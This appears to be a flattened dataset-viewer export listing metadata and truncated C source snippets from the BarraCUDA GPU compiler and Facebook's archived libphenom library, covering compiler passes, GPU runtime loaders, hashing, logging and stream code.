repo_full_name
stringlengths
6
93
repo_url
stringlengths
25
112
repo_api_url
stringclasses
28 values
owner
stringclasses
28 values
repo_name
stringclasses
28 values
description
stringclasses
28 values
stars
int64
617
98.8k
forks
int64
31
355
watchers
int64
990
999
license
stringclasses
2 values
default_branch
stringclasses
2 values
repo_created_at
timestamp[s]date
2012-07-24 23:12:50
2025-06-16 08:07:28
repo_updated_at
timestamp[s]date
2026-02-23 15:23:15
2026-05-03 18:52:12
repo_topics
listlengths
0
13
repo_languages
unknown
is_fork
bool
1 class
open_issues
int64
3
104
file_path
stringlengths
3
208
file_name
stringclasses
509 values
file_extension
stringclasses
1 value
file_size_bytes
int64
101
84k
file_url
stringclasses
627 values
file_raw_url
stringclasses
627 values
file_sha
stringclasses
624 values
language
stringclasses
8 values
parsed_at
stringdate
2026-05-04 01:12:36
2026-05-04 19:41:55
text
stringlengths
100
102k
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/fe/sema.c
null
null
null
null
null
null
C
2026-05-04T19:08:10.779335
#include "sema.h" #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <ctype.h> /* * Semantic analysis for BarraCUDA. * Two passes: collect declarations, then type-check function bodies. * Writes node_types[] side table so the BIR lowerer can stop guessing. */ /* ---- AST Navigation (same helpers...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_dce.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.042608
#include "bir_dce.h" #include <string.h> /* * bir_dce: dead code elimination. * * Remove instructions whose results are never referenced and that * have no side effects. Iterates to fixpoint since removing one * dead instruction may make its operands' producers dead too. * Then compact surviving instructions an...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/nvidia/nv_rt.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.798575
/* nv_rt.c — BarraCUDA NVIDIA Runtime Launcher * * Loads nvcuda.dll (Windows) or libcuda.so (Linux) at runtime. * No CUDA SDK needed at compile time. Just a working NVIDIA driver. * * The CUDA Driver API is refreshingly sane compared to HSA. No AQL * packets, no doorbell signals, no kernarg pools, no IOMMU permis...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/nvidia/emit.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.799980
#include "nvidia.h" #include <stdio.h> #include <string.h> #include <stdarg.h> /* PTX text emission. We generate polite ASCII that ptxas will JIT into * whatever SASS NVIDIA deems appropriate. Like writing a prayer and * sliding it under the cathedral door. */ /* ---- Output Buffer ---- */ static void nv_apnd(nv_m...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_mem2reg.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.801894
#include "bir_mem2reg.h" #include <string.h> /* * mem2reg: promote stack allocas to SSA registers with phi nodes. * * Classic algorithm: compute dominance frontiers, insert phis at the * iterated dominance frontier of each alloca's store set, then rename * variables via iterative domtree walk. No recursion. No ...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_mem2reg.h
null
null
null
null
null
null
C
2026-05-04T19:08:11.805760
#ifndef BARRACUDA_BIR_MEM2REG_H #define BARRACUDA_BIR_MEM2REG_H #include "bir.h" /* * Promote stack allocas to SSA registers. * * Scalar allocas whose only uses are plain loads and stores * (no GEP, no call argument, no volatile) get replaced with * direct values and phi nodes. Array / struct / address-taken *...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_lower.h
null
null
null
null
null
null
C
2026-05-04T19:08:11.815006
#ifndef BARRACUDA_BIR_LOWER_H #define BARRACUDA_BIR_LOWER_H #include "bir.h" #include "parser.h" #include "sema.h" #define BC_ERR_LOWER -5 /* * Lower AST to BIR. Device-side functions only. * Host functions are scanned for kernel launches to trigger template instantiation. * Returns 0 on success, negative on erro...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/nvidia/isel.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.817150
#include "nvidia.h" #include <string.h> /* BIR SSA -> PTX pseudo-MIR. Virtual registers, text output, no binary * encoding. The NVIDIA driver does the heavy lifting — register allocation, * scheduling, all the hard bits. We just emit polite suggestions in PTX * and hope for the best. Like posting a letter to a corp...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/main.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.818187
#include "preproc.h" #include "lexer.h" #include "parser.h" #include "sema.h" #include "bir_lower.h" #include "bir_mem2reg.h" #include "bir_cfold.h" #include "bir_dce.h" #include "amdgpu.h" #include "sched.h" #include "verify.h" #include "tensix.h" #include "nvidia.h" #include <stdlib.h> static char source_buf[B...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_print.c
null
null
null
null
null
null
C
2026-05-04T19:08:11.855198
#include "bir.h" #include <stdio.h> #include <string.h> /* Where the IR learns to speak. */ /* ---- Type Strings ---- */ static int print_simple_type(const bir_module_t *M, uint32_t tidx, char *buf, int size) { if (tidx >= M->num_types) return snprintf(buf, (size_t)size, "???...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/ir/bir_dce.h
null
null
null
null
null
null
C
2026-05-04T19:08:11.977297
#ifndef BARRACUDA_BIR_DCE_H #define BARRACUDA_BIR_DCE_H #include "bir.h" /* * Dead code elimination. * * Runs after mem2reg. Removes instructions whose results * are never used and that have no side effects. * * Returns the total number of instructions removed (>= 0). */ int bir_dce(bir_module_t *M); #endif ...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/nvidia/nv_rt.h
null
null
null
null
null
null
C
2026-05-04T19:08:12.589402
/* nv_rt.h — BarraCUDA NVIDIA Runtime Launcher * * Thin wrapper around the CUDA Driver API for dispatching PTX kernels * on NVIDIA GPUs. Loads nvcuda.dll / libcuda.so at runtime via * LoadLibrary / dlopen — no compile-time CUDA SDK dependency. * * The irony of an open-source CUDA compiler using NVIDIA's closed-so...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/tensix/coarsen.c
null
null
null
null
null
null
C
2026-05-04T19:08:12.774855
#include "tensix.h" #include <string.h> #include <stdio.h> /* Thread coarsening + host code generation. Translates "one thread per element" * into one core, many tiles, 32 lanes doing the actual work. */ typedef struct { uint32_t tid[3]; /* BIR_THREAD_ID uses per dimension */ uint32_t bid[3]; ...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/runtime/bc_runtime.c
null
null
null
null
null
null
C
2026-05-04T19:08:12.776129
/* bc_runtime.c — BarraCUDA HSA Runtime Launcher * dlopen's libhsa-runtime64.so. No compile-time ROCm dependency. Linux only. */ #ifdef __linux__ #include "bc_runtime.h" #include "bc_abend.h" #include <stdio.h> #include <string.h> #include <stdlib.h> #include <dlfcn.h> /* ---- HSA Type Definitions ---- */ typedef ...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/runtime/bc_runtime.h
null
null
null
null
null
null
C
2026-05-04T19:08:12.777893
/* bc_runtime.h — BarraCUDA HSA Runtime Launcher * Thin wrapper around libhsa-runtime64.so for dispatching .hsaco kernels * on AMD GPUs. Linux/ROCm only. Loads libhsa at runtime via dlopen. */ #ifndef BC_RUNTIME_H #define BC_RUNTIME_H #include <stdint.h> #include <stddef.h> /* ---- Error Codes ---- */ #define BC_...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/nvidia/nvidia.h
null
null
null
null
null
null
C
2026-05-04T19:08:12.781296
#ifndef BARRACUDA_NVIDIA_H #define BARRACUDA_NVIDIA_H #include "bir.h" /* NVIDIA PTX backend. The irony of an open-source CUDA compiler targeting * NVIDIA hardware is not lost on us. Think of it as returning a library * book — to a library that charges admission and checks your bag. */ #define BC_ERR_NVIDIA -8 /...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/runtime/bc_abend.h
null
null
null
null
null
null
C
2026-05-04T19:08:12.791727
/* bc_abend.h -- GPU ABEND dump diagnostics for BarraCUDA * * Oh yeah baby, mainframes are IN, chopped error messages are OUT. * IBM solved crash diagnostics in the 1960s. We're solving them in the * 2020s, sixty years late, on a GPU. Progress is a flat circle. * * ab_ctx_t is ~37KB, caller heap-allocates it. */ ...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/runtime/bc_abend.c
null
null
null
null
null
null
C
2026-05-04T19:08:12.799390
/* bc_abend.c -- GPU ABEND dump diagnostics for BarraCUDA * * When your kernel faults, AMD gives you a cryptic one-liner about * "Memory access fault, Reason: Unknown." Cheers for that. We hook * the HSA fault callback, correlate the fault address against tracked * allocations, and produce a structured dump that w...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/tensix/datamov.c
null
null
null
null
null
null
C
2026-05-04T19:08:12.799923
#include "tensix.h" #include <string.h> #include <stdio.h> #include <stdarg.h> /* Data movement: reader kernels, writer kernels, host programs. * Three RISC-V cores per tile, connected by circular buffers. * The compute core thinks it's special. It isn't. */ /* ---- Helpers ---- */ static void dm_write(FILE *fp, c...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/tensix/tensix.h
null
null
null
null
null
null
C
2026-05-04T19:08:13.837408
#ifndef BARRACUDA_TENSIX_H #define BARRACUDA_TENSIX_H #include "bir.h" /* Tenstorrent Tensix backend. 32-lane SFPU, 8 writable LRegs, predicated * execution, no branches, and a register that contains 0.8373. * ISA from sfpi-binutils + corsix.org. */ #define BC_ERR_TENSIX -7 /* ---- Target Constants ---- */ #de...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/tensix/emit.c
null
null
null
null
null
null
C
2026-05-04T19:08:14.498489
#include "tensix.h" #include <stdlib.h> #include <string.h> #include <stdarg.h> /* Register allocation, binary encoding, C++ output. Eight LRegs on Tensix, * eight GPRs on System/360. The wheel turns. */ /* ---- Encoding Table (Wormhole B0) ---- */ static const tt_enc_entry_t enc_table_sparse[] = { /* Data movem...
Zaneham/BarraCUDA
https://github.com/Zaneham/BarraCUDA
null
null
null
null
1,670
null
null
apache-2.0
null
null
null
null
null
null
null
src/tensix/isel.c
null
null
null
null
null
null
C
2026-05-04T19:08:17.771737
#include "tensix.h" #include <string.h> /* BIR SSA -> SFPU machine IR. 32 lanes pretending to be a million threads. */ static struct { tt_module_t *tt; const bir_module_t *bir; uint32_t dst_offset; uint32_t block_map[BIR_MAX_BLOCKS]; #define TT_MAX_PRED_DEPTH 32 struct { ...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/dns/addrinfo.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.167696
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/counter.h
null
null
null
null
null
null
C
2026-05-04T19:08:21.168903
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/error.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.177131
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/ck_hs.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.183040
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/config.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.189131
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/dtoa.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.202741
/**************************************************************** * @nolint * The author of this software is David M. Gay. * * Copyright (c) 1991, 2000, 2001 by Lucent Technologies. * * Permission to use, copy, modify, and distribute this software for any * purpose without fee is hereby granted, provided that th...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/boot.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.205289
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/buf.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.206523
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/debug_console.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.219293
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/counter.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.232398
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/sockaddr.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.983747
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/counter.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.984325
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/hook.c
null
null
null
null
null
null
C
2026-05-04T19:08:21.999837
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/gimli.h
null
null
null
null
null
null
C
2026-05-04T19:08:22.000368
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/log.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.003820
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/hash/murmur.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.016912
/* NOLINT(legal/copyright) * Murmur Hash is in the public domain. This version from Peter Scott, * translated from the original version from Austin Appleby. */ #include "phenom/sysutil.h" #include <stdint.h> #include <ck_cc.h> static CK_CC_INLINE uint64_t rotl64(uint64_t x, int8_t r) { return (x << r) | (x >> (64...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/init.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.018733
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/gimli/thread.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.023362
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/hash/table.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.024639
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/job.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.078897
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/memory.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.593040
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/log.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.599903
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/job.h
null
null
null
null
null
null
C
2026-05-04T19:08:22.606827
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/log.h
null
null
null
null
null
null
C
2026-05-04T19:08:22.623904
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/net/listener.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.652176
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/nbio/portfs.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.659554
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/nbio/epoll.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.689994
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/nbio/common.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.707286
/* * Copyright 2012-2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agre...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/nbio/kqueue.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.714643
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/net/sockaddr.c
null
null
null
null
null
null
C
2026-05-04T19:08:22.717364
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/openssl/bio_bufq.c
null
null
null
null
null
null
C
2026-05-04T19:08:24.280553
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/openssl/bio_stream.c
null
null
null
null
null
null
C
2026-05-04T19:08:24.718008
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/openssl/init.c
null
null
null
null
null
null
C
2026-05-04T19:08:24.718696
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/net/socket.c
null
null
null
null
null
null
C
2026-05-04T19:08:24.720385
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/make.c
null
null
null
null
null
null
C
2026-05-04T19:08:25.231368
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/read.c
null
null
null
null
null
null
C
2026-05-04T19:08:25.456734
/* Copyright 2005-2013 Rich Felker Copyright 2013 Facebook, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, ...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/string.c
null
null
null
null
null
null
C
2026-05-04T19:08:25.649900
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/temp.c
null
null
null
null
null
null
C
2026-05-04T19:08:25.705090
/* Copyright 2005-2013 Rich Felker Copyright 2013 Facebook, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, ...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/write.c
null
null
null
null
null
null
C
2026-05-04T19:08:26.049643
/* Copyright 2005-2013 Rich Felker Copyright 2013 Facebook, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, ...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/string.c
null
null
null
null
null
null
C
2026-05-04T19:08:26.277876
